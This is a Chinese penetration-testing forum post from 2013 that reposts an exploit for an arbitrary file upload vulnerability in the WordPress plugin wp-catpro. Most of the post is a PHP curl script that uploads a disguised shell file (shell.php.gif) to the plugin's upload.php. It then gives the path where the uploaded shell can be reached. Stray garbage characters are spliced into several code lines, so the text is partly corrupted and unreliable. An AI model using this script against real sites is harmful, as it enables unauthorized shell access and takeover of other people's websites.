中国网络渗透测试联盟

标题: WordPress插件wp-catpro任意文件上传 [打印本页]

---

作者: admin    时间: 2013-2-27 20:12
标题: WordPress插件wp-catpro任意文件上传
Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability
; w( F, ^9 b  R) _1 G- M# X5 Z#-----------------------------------------------------------------------
9 t8 J2 Y/ R; p
: V; m) M/ r, V& l- b作者  => Zikou-16
邮箱 => zikou16x@gmail.com
测试系统 : Windows 7 , Backtrack 5r3
下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
7 y7 f' f( y# x8 ^, w6 j####

#=> Exploit 信息:
------------------
# 攻击者可以上传 file/shell.php.gif
& W! ~* g; Q) s( Y# ("jpg", "gif", "png")  // Allowed file extensions
: A- W; L; ]2 f: K3 e, N# "/uploads/";  // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
+ ^+ m8 Z6 X' s7 N  q# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
------------------
7 V% B0 T: g, q0 E5 a3 ^
#=> Exploit
2 o# d! d( q9 P-----------
<?php
! L; C* e0 d+ F+ D! k  m
. a. S0 b6 [1 n; H) y. d$uploadfile="zik.php.gif";
$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
'folder'=>'/wp-content/uploads/catpro/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
0 M8 ]6 ?; n' Q. A$postResult = curl_exec($ch);
! O$ \2 p4 E7 ?2 u9 b  ~+ Ucurl_close($ch);

print "$postResult";

; m' }" |) @: T8 h+ y! U6 WShell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
' a' f4 y% ~2 o  {: L* y7 ~  ?>
<?php
phpinfo();
?>

---

欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)

Powered by Discuz! X3.2